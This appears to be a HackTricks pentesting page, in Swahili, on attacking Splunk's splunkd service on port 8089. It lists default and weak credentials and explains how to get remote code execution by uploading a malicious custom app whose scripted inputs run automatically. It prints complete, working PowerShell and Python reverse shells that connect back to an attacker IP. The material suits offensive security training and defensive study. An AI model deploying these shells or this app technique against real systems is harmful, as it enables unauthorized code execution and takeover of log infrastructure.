8089 - Pentesting Splunkd
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Msingi wa Taarifa
- Zana ya uchambuzi wa log inayotumika kwa ukusanyaji wa data, uchambuzi, na uonyeshaji
- Inatumika sana katika ufuatiliaji wa usalama na uchambuzi wa biashara
- Bandari za kawaida:
- Seva ya wavuti: 8000
- Huduma ya Splunkd: 8089
Njia za Uthibitishaji wa Uthibitisho:
- Ukatili wa Toleo la Bure
- Toleo la majaribio linabadilishwa kiotomatiki kuwa toleo la bure baada ya siku 60
- Toleo la bure halina uthibitisho
- Hatari ya usalama ikiwa halitashughulikiwa
- Wasimamizi wanaweza kupuuza athari za usalama
- Udhaifu wa Akreditivu
- Toleo za zamani: Akreditivu za kawaida
admin:changeme
- Toleo za kisasa: Akreditivu huwekwa wakati wa usakinishaji
- Uwezekano wa matumizi ya nywila dhaifu (mfano,
admin
,Welcome
,Password123
)
- Fursa za Utekelezaji wa Msimbo wa Kijijini
- Njia nyingi za utekelezaji wa msimbo:
- Programu za Django upande wa seva
- Ncha za REST
- Ingizo la skripti
- Skripti za arifa
- Msaada wa majukwaa tofauti (Windows/Linux)
- Ingizo la skripti linaweza kukimbia:
- Skripti za Bash
- Skripti za PowerShell
- Skripti za Batch
Uwezekano wa Ukatili Muhimu:
- Hifadhi ya data nyeti
- Ukosefu wa uthibitisho katika toleo la bure
- Njia nyingi za uwezekano wa utekelezaji wa msimbo wa kijijini
- Uwezekano wa kutumia ingizo la skripti kwa kuathiri mfumo
Shodan
Splunk build
RCE
Unda Programu Maalum
Splunk inatoa njia ya kisasa ya utekelezaji wa msimbo wa kijijini kupitia usambazaji wa programu maalum, ikitumia uwezo wake wa skripti za majukwaa tofauti. Mbinu ya msingi ya ukatili inahusisha kuunda programu mbaya inayoweza kutekeleza shell za kinyume kwenye mifumo ya Windows na Linux.
Programu maalum inaweza kukimbia Python, Batch, Bash, au PowerShell scripts. Zaidi ya hayo, Splunk inakuja na Python iliyosakinishwa, hivyo hata katika mifumo ya Windows utaweza kukimbia msimbo wa python.
Unaweza kutumia hii mfano na bin
inayojumuisha mfano wa Python na PowerShell. Au unaweza kuunda yako mwenyewe.
Mchakato wa ukatili unafuata mbinu thabiti katika majukwaa:
splunk_shell/
├── bin (reverse shell scripts)
└── default (inputs.conf configuration)
Faili muhimu la usanidi inputs.conf
linawezesha skripti kwa:
- Kuweka
disabled = 0
- Kuunda kipindi cha utekelezaji cha sekunde 10
- Kuelezea aina ya chanzo cha skripti
Kuweka ni rahisi:
- Tengeneza kifurushi cha programu mbaya
- Weka msikilizaji (Netcat/socat) kwenye mashine ya kushambulia
- Pakia programu kupitia kiolesura cha Splunk
- Washa utekelezaji wa skripti kiotomatiki baada ya kupakia
Mfano wa Windows PowerShell reverse shell:
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Sample Linux Python reverse shell:
import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
RCE & Privilege Escalation
Katika ukurasa ufuatao unaweza kupata maelezo jinsi huduma hii inaweza kutumika vibaya ili kupandisha hadhi na kupata kudumu:
References
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.